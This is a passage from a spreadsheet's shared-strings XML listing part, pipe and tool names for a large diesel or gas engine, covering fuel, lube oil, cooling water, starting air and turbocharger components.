    <t>COOLING OIL INLET ENGINE</t>
  </si>
  <si>
    <t>COOLING OIL OUTLET ENGINE</t>
  </si>
  <si>
    <t>FUEL OIL RETURN PIPE</t>
  </si>
  <si>
    <t>DRAIN PIPE FROM FILTER</t>
  </si>
  <si>
    <t>DRAIN FROM PUMPS</t>
  </si>
  <si>
    <t>BY-PASS PUMP</t>
  </si>
  <si>
    <t>COVER FOR DELIVERY PIPE</t>
  </si>
  <si>
    <t>PIPE CLAMP F. CYL SECTION</t>
  </si>
  <si>
    <t>PIPE FROM FUEL PUMP DRAIN</t>
  </si>
  <si>
    <t>BRANCH PIPE F.FUEL O.EXH.</t>
  </si>
  <si>
    <t>BRANCH PIPE CYLINDER HEAD</t>
  </si>
  <si>
    <t>BRANCH PIPE SEALING OIL</t>
  </si>
  <si>
    <t>ARR. OF FUEL OIL CONNECT.</t>
  </si>
  <si>
    <t>SEALING RING - VITON</t>
  </si>
  <si>
    <t>CAP FOR DELIVERY PIPE</t>
  </si>
  <si>
    <t>BRANCH PIPE COOLING OIL</t>
  </si>
  <si>
    <t>BRANCH PIPE F.COOL.O.INL.</t>
  </si>
  <si>
    <t>FUEL OIL DIAGRAM</t>
  </si>
  <si>
    <t>INSTRUCT.F.FUEL O.INSTALL</t>
  </si>
  <si>
    <t>BRANCH PIPE FOR INERT GAS</t>
  </si>
  <si>
    <t>BRANCH PIPE LUB.O. F.PUMP</t>
  </si>
  <si>
    <t>MOUNT. OF FLEX. CONNECT.</t>
  </si>
  <si>
    <t>FUEL INJECTION PIPE</t>
  </si>
  <si>
    <t>SUPPL.DRW.F.FUEL INJ.PIPE</t>
  </si>
  <si>
    <t>SHIELD PIPE</t>
  </si>
  <si>
    <t>SLEEVE DIVIDED</t>
  </si>
  <si>
    <t>ROUND SEAL RING</t>
  </si>
  <si>
    <t>PRESSURE RING</t>
  </si>
  <si>
    <t>SCREWED SOCKET</t>
  </si>
  <si>
    <t>PRESSURE PIPE</t>
  </si>
  <si>
    <t>COVER F. FLEXIBLE HOSE</t>
  </si>
  <si>
    <t>BRACKET FOR PIPE CLAMP</t>
  </si>
  <si>
    <t>HOUSE FOR ALARM</t>
  </si>
  <si>
    <t>FUEL OIL INLET-PUMP</t>
  </si>
  <si>
    <t>FUEL OIL HIGH-PRESS. PIPE</t>
  </si>
  <si>
    <t>SPARE PART DRG.F.FUELPIPE</t>
  </si>
  <si>
    <t>SEALING RING, VITON</t>
  </si>
  <si>
    <t>BRANCH PIPE-COOL.OIL INL.</t>
  </si>
  <si>
    <t>BRANCH PIPE-COOL.OIL OUTL</t>
  </si>
  <si>
    <t>BRANCH PIPE-FUEL OIL OUTL</t>
  </si>
  <si>
    <t>PIPE SUPPORT</t>
  </si>
  <si>
    <t>NECK FLANGE</t>
  </si>
  <si>
    <t>OVAL SADDLE FLANGE</t>
  </si>
  <si>
    <t>PIPE FOR DRAIN BOX</t>
  </si>
  <si>
    <t>DISTRIBUTOR PIECE</t>
  </si>
  <si>
    <t>FOOT-DISTRIBUTION PIECE</t>
  </si>
  <si>
    <t>SLIDE BODY</t>
  </si>
  <si>
    <t>HOUSING FOR SLIDE VALVE</t>
  </si>
  <si>
    <t>HOUSING FOR DIAPHRAGM</t>
  </si>
  <si>
    <t>HOUSING F. SAFETY VALVE</t>
  </si>
  <si>
    <t>DUMMY, SAFETY VALVE</t>
  </si>
  <si>
    <t>GRIND.MANDREL-F.OIL PIPE</t>
  </si>
  <si>
    <t>CUTTER-FUEL OIL PIPE</t>
  </si>
  <si>
    <t>HOUSE-MILL.TOOL-H.P.PIPE</t>
  </si>
  <si>
    <t>UNION-MILL.TOOL-H.P.PIPE</t>
  </si>
  <si>
    <t>GUIDE-MILL.TOOL-H.P.PIPE</t>
  </si>
  <si>
    <t>LUB. OIL MANIFOLD</t>
  </si>
  <si>
    <t>SHIELD FOR FLANGE</t>
  </si>
  <si>
    <t>CLEANING OIL PIPE</t>
  </si>
  <si>
    <t>CLEAN. SYSTEM F/FUEL PUMP</t>
  </si>
  <si>
    <t>CLEANING OIL DIAGRAM</t>
  </si>
  <si>
    <t>SOCKET WRENCH</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE MODIFIED</t>
  </si>
  <si>
    <t>SUPPORT-COOLING OIL</t>
  </si>
  <si>
    <t>L.O.PIPE TORS.VIB.DAMPER</t>
  </si>
  <si>
    <t>SUPPORT-LUB.OIL CAMSHAFT</t>
  </si>
  <si>
    <t>MAIN PIPE-CYL.LUBRICATION</t>
  </si>
  <si>
    <t>DRAIN PIPE-BEDPLATE</t>
  </si>
  <si>
    <t>LUBE OIL PIPE, CAMSHAFT</t>
  </si>
  <si>
    <t>CYL.LUB. OIL PIPE</t>
  </si>
  <si>
    <t>VARIOUS PIPES-MAN.SIDE</t>
  </si>
  <si>
    <t>LUBE OIL PIPE-OIL PAN</t>
  </si>
  <si>
    <t>LUB.OIL.PIPE.OUT. SHIELD</t>
  </si>
  <si>
    <t>OVERSPEED STOP PIPE</t>
  </si>
  <si>
    <t>BRANCH PIPE, LUBE OIL</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN CYL. FRAME</t>
  </si>
  <si>
    <t>DRAIN PIPE-CYL.FRAME</t>
  </si>
  <si>
    <t>DRAIN PIPE-SCAV.AIR REC.</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN SCAV.AIR R.</t>
  </si>
  <si>
    <t>SUPPORT-LUB.OIL TC</t>
  </si>
  <si>
    <t>AIR VENTING VALVE</t>
  </si>
  <si>
    <t>SUPPORT F.OUTLET PIPE</t>
  </si>
  <si>
    <t>ADAPTOR F. SAE FLANGE</t>
  </si>
  <si>
    <t>PLUG FOR LEAK OIL</t>
  </si>
  <si>
    <t>CONNECTOR BLOCK, STRAIGHT</t>
  </si>
  <si>
    <t>CONECTOR BLOCK, 90 DEGR.</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE</t>
  </si>
  <si>
    <t>FLANGE FOR H.P.PIPE</t>
  </si>
  <si>
    <t>PIPE HEAD</t>
  </si>
  <si>
    <t>LUB.OIL INLET PIPE</t>
  </si>
  <si>
    <t>BRANCH P.SEAL.OIL INLET</t>
  </si>
  <si>
    <t>BRANCH P.SEAL.OIL OUTLET</t>
  </si>
  <si>
    <t>CONN.BLOCK, 90 DEG.BORE</t>
  </si>
  <si>
    <t>BRACING</t>
  </si>
  <si>
    <t>CONN. BLOCK</t>
  </si>
  <si>
    <t>LUBE OIL PIPE ON AFT. END</t>
  </si>
  <si>
    <t>LUB. OIL DIAGRAM</t>
  </si>
  <si>
    <t>LUB. OIL INLET PUMP</t>
  </si>
  <si>
    <t>LUB. OIL FOR ROLLER GUIDE</t>
  </si>
  <si>
    <t>LUB.PIPE F.ROLLERG&amp;ROCKAR</t>
  </si>
  <si>
    <t>LUB. OIL FOR ROCKER ARM</t>
  </si>
  <si>
    <t>LUB. O. OUTL. SUCT. PIPE</t>
  </si>
  <si>
    <t>OUTL. PUMP INL. THERM. V.</t>
  </si>
  <si>
    <t>OUTL. THERM. V. INL. COOL</t>
  </si>
  <si>
    <t>OUTL. THERM. VALVE/COOLER</t>
  </si>
  <si>
    <t>LUBE O. DISTRIBUTION PIPE</t>
  </si>
  <si>
    <t>BRANCH F. SEALING OIL</t>
  </si>
  <si>
    <t>ARR. OF LUBE O. PIPE T.C.</t>
  </si>
  <si>
    <t>DRAIN PIPE FROM T.C.</t>
  </si>
  <si>
    <t>PRESSURE REG. VALVE</t>
  </si>
  <si>
    <t>RESTRICTION 1/5</t>
  </si>
  <si>
    <t>LEVEL SWITCH ARRANGEMENT</t>
  </si>
  <si>
    <t>SHIELD F.L.O.PIPE T.C</t>
  </si>
  <si>
    <t>LUB. OIL INLET COOLER</t>
  </si>
  <si>
    <t>INLET SEALING OIL FILTER</t>
  </si>
  <si>
    <t>OUTLET SEALING OIL FILTER</t>
  </si>
  <si>
    <t>SUSPENS.F.SEAL.OIL FILTER</t>
  </si>
  <si>
    <t>BRANCH FOR DISTRI. PIPE</t>
  </si>
  <si>
    <t>MAGNETIC FILTER</t>
  </si>
  <si>
    <t>LUB. OIL SYSTEM I</t>
  </si>
  <si>
    <t>LUB. OIL SYSTEM II</t>
  </si>
  <si>
    <t>ARR. OF FORCED LUBE OIL</t>
  </si>
  <si>
    <t>BRACKET F. HAND WING PUMP</t>
  </si>
  <si>
    <t>HAND WING PUMP</t>
  </si>
  <si>
    <t>INLET THERMOSTATIC VALVE</t>
  </si>
  <si>
    <t>OUTLET THERMOSTATIC VALVE</t>
  </si>
  <si>
    <t>INLET LUB. OIL FILTER</t>
  </si>
  <si>
    <t>LUBE OIL DISTRIBUTOR PIPE</t>
  </si>
  <si>
    <t>L.O.PIPE F.FUEL PUMP/GOV.</t>
  </si>
  <si>
    <t>OUTL.PRESS.GOVERN.INL.ENG</t>
  </si>
  <si>
    <t>BRANCH FOR FLOW SWITCH</t>
  </si>
  <si>
    <t>LUB.O.PIPE GENERATOR INL.</t>
  </si>
  <si>
    <t>SHIELD FOR PLATE COOLERS</t>
  </si>
  <si>
    <t>LUB. OF GEAR WHEEL DRIVE</t>
  </si>
  <si>
    <t>LUB. OIL ARRANGEMENT</t>
  </si>
  <si>
    <t>SEALING OIL DIAGRAM</t>
  </si>
  <si>
    <t>REMACHINING OF HOUSING</t>
  </si>
  <si>
    <t>RESTRICTION F.LUB.O. PIPE</t>
  </si>
  <si>
    <t>STUD FOR STARTING A. PIPE</t>
  </si>
  <si>
    <t>BLOCK FOR START.AIR INLET</t>
  </si>
  <si>
    <t>SPINDEL</t>
  </si>
  <si>
    <t>BURSTING CAP PROTECTOR</t>
  </si>
  <si>
    <t>GUIDE PIN FOR LOCK. PLATE</t>
  </si>
  <si>
    <t>PERFORATED CYLINDER</t>
  </si>
  <si>
    <t>BURSTING DISC</t>
  </si>
  <si>
    <t>CHECK PLATE</t>
  </si>
  <si>
    <t>BURSTING CAP COVER</t>
  </si>
  <si>
    <t>SEALING AIR PIPE</t>
  </si>
  <si>
    <t>CONTR.AIR PIPE,ST.DISTRIB</t>
  </si>
  <si>
    <t>SUPPORT,SEALING AIR PIPE</t>
  </si>
  <si>
    <t>CONTR.AIR PIPE-ST.VALVE</t>
  </si>
  <si>
    <t>SUPPORT-CONTROL AIR PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE-CLEANING TURBO.</t>
  </si>
  <si>
    <t>SUPPORT-CLEANING TC</t>
  </si>
  <si>
    <t>JACKET</t>
  </si>
  <si>
    <t>BURSTING PLATE</t>
  </si>
  <si>
    <t>AIR ADJUSMENT SCREW</t>
  </si>
  <si>
    <t>STARTING AIR INLET</t>
  </si>
  <si>
    <t>RESTRICTION FOR AIR PIPE</t>
  </si>
  <si>
    <t>DIAGRAM OF REMOTE CONTROL</t>
  </si>
  <si>
    <t>PIPE F.LUB.OF ST.AIRDIST</t>
  </si>
  <si>
    <t>ANGLE PROFIL.F.PIPE CLAMP</t>
  </si>
  <si>
    <t>ARR. OF AIR TO BOOSTER</t>
  </si>
  <si>
    <t>ORIFICE, JET ASSIST</t>
  </si>
  <si>
    <t>BRACKET F. SOLENOID VALVE</t>
  </si>
  <si>
    <t>BRANCH PIPE</t>
  </si>
  <si>
    <t>FLANGE F. ST. AIR DISTRB.</t>
  </si>
  <si>
    <t>ARR. F. CONTROL AIR PIPE</t>
  </si>
  <si>
    <t>WELD.COUPL. WITHOUT UNION</t>
  </si>
  <si>
    <t>STRAINER</t>
  </si>
  <si>
    <t>FRESHWATER INLET-OUTLET</t>
  </si>
  <si>
    <t>MAIN PIPE-FRESHWATER INL.</t>
  </si>
  <si>
    <t>BLOCK FOR FRESWATER, INL.</t>
  </si>
  <si>
    <t>FLANGE, FRESHW. PIPE INL.</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN FRESHWATER</t>
  </si>
  <si>
    <t>DRAIN PIPE-FRESHWATER</t>
  </si>
  <si>
    <t>SUPPORT-FRESHWATER</t>
  </si>
  <si>
    <t>THERMOMETER PIECE</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN FUNNEL TC</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN FRESH WATER</t>
  </si>
  <si>
    <t>DRAIN PIPE,CLEANING TC</t>
  </si>
  <si>
    <t>SUPPORT,CLEANING TC</t>
  </si>
  <si>
    <t>CLEANING PIPE-AIR COOLER</t>
  </si>
  <si>
    <t>SUPPORT-CLEANING AC</t>
  </si>
  <si>
    <t>DRAIN PIPE-AIR COOLER</t>
  </si>
  <si>
    <t>WATER MIST CATCHER</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN AC</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN FUNNEL AC</t>
  </si>
  <si>
    <t>DRAIN PIPE-AUX.BLOWER</t>
  </si>
  <si>
    <t>SUPPORT DRAIN PIPE</t>
  </si>
  <si>
    <t>SUPPORT-COOLING WATER AC</t>
  </si>
  <si>
    <t>LAMELLA PROFILE</t>
  </si>
  <si>
    <t>COOL. W. PIPE, AIR COOLER</t>
  </si>
  <si>
    <t>COLUMN</t>
  </si>
  <si>
    <t>BASE PLATE,W.MIST CATCHER</t>
  </si>
  <si>
    <t>TOP PLATE, W.MIST CATCHER</t>
  </si>
  <si>
    <t>PIPE-BENT</t>
  </si>
  <si>
    <t>COOLING WATER OUTLET PIPE</t>
  </si>
  <si>
    <t>RECTANGULAR FLANGE</t>
  </si>
  <si>
    <t>RECTANGULAR BLANK FLANGE</t>
  </si>
  <si>
    <t>ELBOW UNION</t>
  </si>
  <si>
    <t>COOLING WATER I</t>
  </si>
  <si>
    <t>COOLING WATER II</t>
  </si>
  <si>
    <t>L.T. INTERMEDIATE PIPE</t>
  </si>
  <si>
    <t>H.T. COLLECTING PIPE</t>
  </si>
  <si>
    <t>L.T. OUTLET ENGINE</t>
  </si>
  <si>
    <t>F.W. OUTL. ENG. INL. AMOT</t>
  </si>
  <si>
    <t>H.T. INLET TURBOCHARGER</t>
  </si>
  <si>
    <t>BRANCH F.COOL.W.COLL.PIPE</t>
  </si>
  <si>
    <t>OUTLET CH. AIR COOLER/ICS</t>
  </si>
  <si>
    <t>INLET CH. AIR COOLER/ICS</t>
  </si>
  <si>
    <t>H.T. DISTRIBUTION PIPE</t>
  </si>
  <si>
    <t>MOUNT. OF COOL. WATER THERMOSTAT</t>
  </si>
  <si>
    <t>ARR. OF COOL. WATER THERMOSTAT</t>
  </si>
  <si>
    <t>THERMOSTAT HOUSING</t>
  </si>
  <si>
    <t>BLIND ELEMENT</t>
  </si>
  <si>
    <t>PIPE FOR PI01</t>
  </si>
  <si>
    <t>PIPE FOR PI10</t>
  </si>
  <si>
    <t>OUTL. CH. AIR/L.O. COOLER</t>
  </si>
  <si>
    <t>INL. CH. AIR/L.O. COOLER</t>
  </si>
  <si>
    <t>INLET CH. AIR COOLER</t>
  </si>
  <si>
    <t>OUTLET LUB. OIL COOLER</t>
  </si>
  <si>
    <t>THERMOMETER PIECE (BLANK)</t>
  </si>
  <si>
    <t>FIXING PLATE FOR CLAMP</t>
  </si>
  <si>
    <t>BOTTOMPLATE FOR CLAMP</t>
  </si>
  <si>
    <t>H.T. INTERMEDIATE PIPE</t>
  </si>
  <si>
    <t>OUTLET CH.AIR COOLER</t>
  </si>
  <si>
    <t>H.T. OUTLET THERM. VALVE</t>
  </si>
  <si>
    <t>FRESHWATER INLET, ENGINE</t>
  </si>
  <si>
    <t>THRUST BUSH</t>
  </si>
  <si>
    <t>TEE-COUPLING H.P.</t>
  </si>
  <si>
    <t>TEE-COUPLING L.P.</t>
  </si>
  <si>
    <t>PIPE BEND HIGH PRESSURE</t>
  </si>
  <si>
    <t>COUPLING SCREW</t>
  </si>
  <si>
    <t>FLEXIBLE STEEL PIPE</t>
  </si>
  <si>
    <t>SPRING RING</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE COMPL.</t>
  </si>
  <si>
    <t>FLEXIBLE STEEL TUBE</t>
  </si>
  <si>
    <t>SPRING HOLDER</t>
  </si>
  <si>
    <t>PLATE FOR VALVE</t>
  </si>
  <si>
    <t>SEALING OIL UNIT</t>
  </si>
  <si>
    <t>MINI VALVE</t>
  </si>
  <si>
    <t>HEXAGON SOCKET SET SCREW</t>
  </si>
  <si>
    <t>PISTON HOUSING</t>
  </si>
  <si>
    <t>STEEL BLOCK</t>
  </si>
  <si>
    <t>CROSS COUPLING</t>
  </si>
  <si>
    <t>GAS AND OIL SEPARATOR</t>
  </si>
  <si>
    <t>DISTRIBUTION PIPE</t>
  </si>
  <si>
    <t>M. OF GAS/AIR INLET PIPE</t>
  </si>
  <si>
    <t>PIPE COUPLING</t>
  </si>
  <si>
    <t>HOLDING ANGLE</t>
  </si>
  <si>
    <t>GAS TRAIN</t>
  </si>
  <si>
    <t>ATT. IMPULSE TRANSMITTER</t>
  </si>
  <si>
    <t>M.OF HALL EFFECT DETECTOR</t>
  </si>
  <si>
    <t>GAS/AIR INLET PIPE</t>
  </si>
  <si>
    <t>THROTTLE VALVE</t>
  </si>
  <si>
    <t>FLAME BREAKER</t>
  </si>
  <si>
    <t>CHARGE RECEIVER</t>
  </si>
  <si>
    <t>LINKAGE F.THROTTLE VALVE</t>
  </si>
  <si>
    <t>PROTECTIVE GRATE</t>
  </si>
  <si>
    <t>DAMPING PLATE</t>
  </si>
  <si>
    <t>INTERMEDIATE BEARING</t>
  </si>
  <si>
    <t>MOUNT. OF SUPPORT BEARING</t>
  </si>
  <si>
    <t>SPEC. FOR ALTERNATOR</t>
  </si>
  <si>
    <t>ALIGNMENT PROCEDURE</t>
  </si>
  <si>
    <t>HYDRAULIC TOOLS, GENERAL</t>
  </si>
  <si>
    <t>LIFTING TOOLS F. ENGINE</t>
  </si>
  <si>
    <t>LIFTING TOOL-TOP SECTION</t>
  </si>
  <si>
    <t>LIFTING TOOL-BEDPLATE</t>
  </si>
  <si>
    <t>LIFTING TOOL-CRANKSHAFT</t>
  </si>
  <si>
    <t>EYE NUT,LIFTING OF ENGINE</t>
  </si>
  <si>
    <t>LIFT,BASE PLATE COMPLETE</t>
  </si>
  <si>
    <t>FLYWEIGHT-LOWER PART</t>
  </si>
  <si>
    <t>FLYWEIGHT-UPPER PART</t>
  </si>
  <si>
    <t>THRUST PIECE, VOC INLET</t>
  </si>
  <si>
    <t>THRUST PIECE, VOC OUTLET</t>
  </si>
  <si>
    <t>THRUST PIECE,CONTR.FEED</t>
  </si>
  <si>
    <t>TEST BLOCK,BLOW OFF VALVE</t>
  </si>
  <si>
    <t>PIPE,CONTR/SEAL OIL DRAIN</t>
  </si>
  <si>
    <t>DIAGONAL SUPP.F.VOC BLOCK</t>
  </si>
  <si>
    <t>TEST BLOCK,SHUT DOWN VALV</t>
  </si>
  <si>
    <t>U-RING</t>
  </si>
  <si>
    <t>DISMOUNTING VALVE SEAT</t>
  </si>
  <si>
    <t>CLEANING TOOL FOR NOZZLES</t>
  </si>
  <si>
    <t>TOOL F. FLOW CHECK VALVE</t>
  </si>
  <si>
    <t>MAX. PRESSURE INDICATOR</t>
  </si>
  <si>
    <t>SUPL. DRW. FOR INDICATOR</t>
  </si>
  <si>
    <t>SPARE PARTS &amp; TOOL BOX</t>
  </si>
  <si>
    <t>STD. SPARE PARTS</t>
  </si>
  <si>
    <t>PUNCH</t>
  </si>
  <si>
    <t>LASHING FITTINGS</t>
  </si>
  <si>
    <t>TEST TOOL FOR FUEL VALVE</t>
  </si>
  <si>
    <t>CONNECTOR F. NITROGEN GAS</t>
  </si>
  <si>
    <t>AIR-PRESSURE FILTER</t>
  </si>
  <si>
    <t>MAGNIFIER</t>
  </si>
  <si>
    <t>BALANCER</t>
  </si>
  <si>
    <t>DRESSER</t>
  </si>
  <si>
    <t>TOOLS FOR MAINTENANCE</t>
  </si>
  <si>
    <t>TOOL F. GRINDING OF VALVE</t>
  </si>
  <si>
    <t>RATCHET</t>
  </si>
  <si>
    <t>LOCKING PLUG</t>
  </si>
  <si>
    <t>PICTURE OF TOOL KIT</t>
  </si>
  <si>
    <t>TOOLS F. LOW DISM. HEIGHT</t>
  </si>
  <si>
    <t>CALIBRATION TOOL</t>
  </si>
  <si>
    <t>RINGHOLDER-HORIZONTAL</t>
  </si>
  <si>
    <t>RINGHOLDER-SLOPING</t>
  </si>
  <si>
    <t>PIPE-HOLDER</t>
  </si>
  <si>
    <t>ST.TOOL F.NORM. MAINTENAN</t>
  </si>
  <si>
    <t>TWIST DRILL</t>
  </si>
  <si>
    <t>MOUNTING PUNCH F.EXP.PLUG</t>
  </si>
  <si>
    <t>HAND CHAIN HOIST</t>
  </si>
  <si>
    <t>LIFTING BEAM</t>
  </si>
  <si>
    <t>TOOLS FOR RECONDITIONING</t>
  </si>
  <si>
    <t>TOOL F.UPPER MAIN BEARING</t>
  </si>
  <si>
    <t>WIRE</t>
  </si>
  <si>
    <t>TOOL LOCKER</t>
  </si>
  <si>
    <t>LIFTING JACK</t>
  </si>
  <si>
    <t>TOOL BOX COMPLETE</t>
  </si>
  <si>
    <t>VALVE SEAT REFACING MACH.</t>
  </si>
  <si>
    <t>PRESS. TEST TOOLS</t>
  </si>
  <si>
    <t>SCREW BUSH</t>
  </si>
  <si>
    <t>EXTRACTOR</t>
  </si>
  <si>
    <t>TOOLS FOR AUTOLOG</t>
  </si>
  <si>
    <t>MAGNET</t>
  </si>
  <si>
    <t>REPAIR/SERVICE VERICLE</t>
  </si>
  <si>
    <t>EXTRA TOOL</t>
  </si>
  <si>
    <t>TOOL VEHICLE</t>
  </si>
  <si>
    <t>SLIDING PIECE</t>
  </si>
  <si>
    <t>BORRING CUTTER</t>
  </si>
  <si>
    <t>INJECTOR</t>
  </si>
  <si>
    <t>SUPPL.DRAW. F. CE-MARKING</t>
  </si>
  <si>
    <t>TOOLS, COMPL. (KEY-PLAN)</t>
  </si>
  <si>
    <t>SP.PART KIT F. CYL. UNIT</t>
  </si>
  <si>
    <t>HYDR.TOOLS COMPL. CE-MARK</t>
  </si>
  <si>
    <t>FIXATION SCREW</t>
  </si>
  <si>
    <t>INSTRUCTION FOR AUTOLOG</t>
  </si>
  <si>
    <t>CROSS MEMBER FOR SLINGS</t>
  </si>
  <si>
    <t>HEXAGONAL STEEL</t>
  </si>
  <si>
    <t>PLASTIC HOSE</t>
  </si>
  <si>
    <t>BOTTOM FOR WOODEN BOX</t>
  </si>
  <si>
    <t>LID FOR WOODEN BOX</t>
  </si>
  <si>
    <t>COMPRESSION TOOL</t>
  </si>
  <si>
    <t>CROSSBAR</t>
  </si>
  <si>
    <t>EYE SCREW</t>
  </si>
  <si>
    <t>QUICK COUPLING, MALE</t>
  </si>
  <si>
    <t>CLEANING TOOL</t>
  </si>
  <si>
    <t>EXTENSION PIECE</t>
  </si>
  <si>
    <t>SOCKET SPANNER</t>
  </si>
  <si>
    <t>REDUCING PIECE</t>
  </si>
  <si>
    <t>PISTON RING EXPANDERS</t>
  </si>
  <si>
    <t>GUIDE PIPE</t>
  </si>
  <si>
    <t>PRESSURE PUMP COMPLETE</t>
  </si>
  <si>
    <t>MANOMETER FASTEN</t>
  </si>
  <si>
    <t>SPANNER FOR COUPLING NUT</t>
  </si>
  <si>
    <t>WRENCH</t>
  </si>
  <si>
    <t>LIFTING STRAP</t>
  </si>
  <si>
    <t>OIL CONTAINER</t>
  </si>
  <si>
    <t>GUARD MADE OF PLATE IRON</t>
  </si>
  <si>
    <t>TOOL PANEL</t>
  </si>
  <si>
    <t>FITTINGS FOR TOOL PANEL</t>
  </si>
  <si>
    <t>MOUNTING OF NAME PLATE</t>
  </si>
  <si>
    <t>ACRYL PLATE</t>
  </si>
  <si>
    <t>TOOL PANEL COMPLETE</t>
  </si>
  <si>
    <t>LIFTING ARRANGEMENT</t>
  </si>
  <si>
    <t>EXTRACTOR FOR FUEL PUMP</t>
  </si>
  <si>
    <t>HEXAGON NUT W. COLLAR</t>
  </si>
  <si>
    <t>INTERNAL LIMIT GAUGE</t>
  </si>
  <si>
    <t>VENTING SCREW</t>
  </si>
  <si>
    <t>PIN GAUGE</t>
  </si>
  <si>
    <t>EXTRACTOR VALVE SEAT RING</t>
  </si>
  <si>
    <t>BALL HANDLE</t>
  </si>
  <si>
    <t>GRINDING WHEEL</t>
  </si>
  <si>
    <t>REAMER</t>
  </si>
  <si>
    <t>INTERME.PC.F.DISMANT.TOOL</t>
  </si>
  <si>
    <t>HYDRAULIC JACK</t>
  </si>
  <si>
    <t>PLATE FOR GRINDING TABLE</t>
  </si>
  <si>
    <t>PIN FOR GRINDING TABLE</t>
  </si>
  <si>
    <t>NUT FOR GRINDING TABLE</t>
  </si>
  <si>
    <t>GRIND.TOOL F.SEAT F.F.VAL</t>
  </si>
  <si>
    <t>MOUNTING TOOL FOR VALVES</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 901</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 902</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 904</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 905</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 906</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 908</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 909</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 910</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 912</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS901</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS902</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS904</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS905</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS906</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS908</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS909</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS910</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS MS912</t>
  </si>
  <si>
    <t>STEP DOWN GEAR</t>
  </si>
  <si>
    <t>FLANGE,UPPER, LUB.O.OUTL.</t>
  </si>
  <si>
    <t>FLANGE,LOWER, LUB.O.OUTL.</t>
  </si>
  <si>
    <t>RUBBER PLATE, LUB.O.OUTL.</t>
  </si>
  <si>
    <t>STRENGTHENING RING</t>
  </si>
  <si>
    <t>PIPE WITH THREAD</t>
  </si>
  <si>
    <t>PIPE, SHAPED</t>
  </si>
  <si>
    <t>SUPPORT, BOOSTER UNIT</t>
  </si>
  <si>
    <t>SEATING</t>
  </si>
  <si>
    <t>BOLT FOR TOP BRACING</t>
  </si>
  <si>
    <t>FITTED BOLT F.TOP BRACING</t>
  </si>
  <si>
    <t>TOP BRACING MOUNTING BOLT</t>
  </si>
  <si>
    <t>CASING BRACKET PLATE</t>
  </si>
  <si>
    <t>DISTANCE TUBE F.TOP BRAC.</t>
  </si>
  <si>
    <t>LINK DIST. PLATE, INSIDE</t>
  </si>
  <si>
    <t>LINK DIST. PLATE, OUTSIDE</t>
  </si>
  <si>
    <t>LINK FILLING PIECE</t>
  </si>
  <si>
    <t>FORK DISTANCE PIECE</t>
  </si>
  <si>
    <t>FORK PLATE AT TUBE</t>
  </si>
  <si>
    <t>FORK PLATE AT NUT</t>
  </si>
  <si>
    <t>PROTECTION PLATE,PROPOSAL</t>
  </si>
  <si>
    <t>LINK BAR</t>
  </si>
  <si>
    <t>PIPE FOR PROTECTIVE CAP</t>
  </si>
  <si>
    <t>COVER FOR PROTECTIVE CAP</t>
  </si>
  <si>
    <t>NUT FOR HYDR. TENSIONING</t>
  </si>
  <si>
    <t>STAY F. VIBR. COMPENSATOR</t>
  </si>
  <si>
    <t>DIN RAIL</t>
  </si>
  <si>
    <t>RELAY MODULE</t>
  </si>
  <si>
    <t>SUPPORTING  WEDGE</t>
  </si>
  <si>
    <t>NUT,ROUND,TOMMY BAR HOLES</t>
  </si>
  <si>
    <t>SPHERICAL WASHER</t>
  </si>
  <si>
    <t>SPHERICAL NUT</t>
  </si>
  <si>
    <t>STUD, END CHOCK BOLT</t>
  </si>
  <si>
    <t>LINER F.SIDECHOCK,STARBRD</t>
  </si>
  <si>
    <t>LOCK PLATE,SIDECHOCKLINER</t>
  </si>
  <si>
    <t>LINER FOR END CHOCK</t>
  </si>
  <si>
    <t>ALIGN CYL.FRAME AND MOUNT</t>
  </si>
  <si>
    <t>ALIGN FRAME SECT.ON BEDPL</t>
  </si>
  <si>
    <t>SUPPL. DRAWING COOLER BOX</t>
  </si>
  <si>
    <t>DIFFUSOR RING</t>
  </si>
  <si>
    <t>BLADE</t>
  </si>
  <si>
    <t>ENGAGEMENT PARTS</t>
  </si>
  <si>
    <t>COMPRESSOR HOUSING</t>
  </si>
  <si>
    <t>SCROLL HOUSING</t>
  </si>
  <si>
    <t>TURBINE OUTLET</t>
  </si>
  <si>
    <t>UNKNOWN INFONO W. DATA</t>
  </si>
  <si>
    <t>PACKING FOR SEALING AIR</t>
  </si>
  <si>
    <t>GAS INLET</t>
  </si>
  <si>
    <t>COVER FOR SEALING AIR</t>
  </si>
  <si>
    <t>PARTS F.TURB.INLET</t>
  </si>
  <si>
    <t>FOOT FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>GUARD-SILENCER</t>
  </si>
  <si>
    <t>PLATE FOR SILENCER</t>
  </si>
  <si>
    <t>INSULATION (FELT)</t>
  </si>
  <si>
    <t>SCREW FOR MANOMETER</t>
  </si>
  <si>
    <t>DIFFUSOR VANE</t>
  </si>
  <si>
    <t>PLATE FOR DIFFUSOR</t>
  </si>
  <si>
    <t>NOZZLE VANE</t>
  </si>
  <si>
    <t>CENTER.KEYS F.NOZZLE RING</t>
  </si>
  <si>
    <t>INNER RING</t>
  </si>
  <si>
    <t>OUTER RING</t>
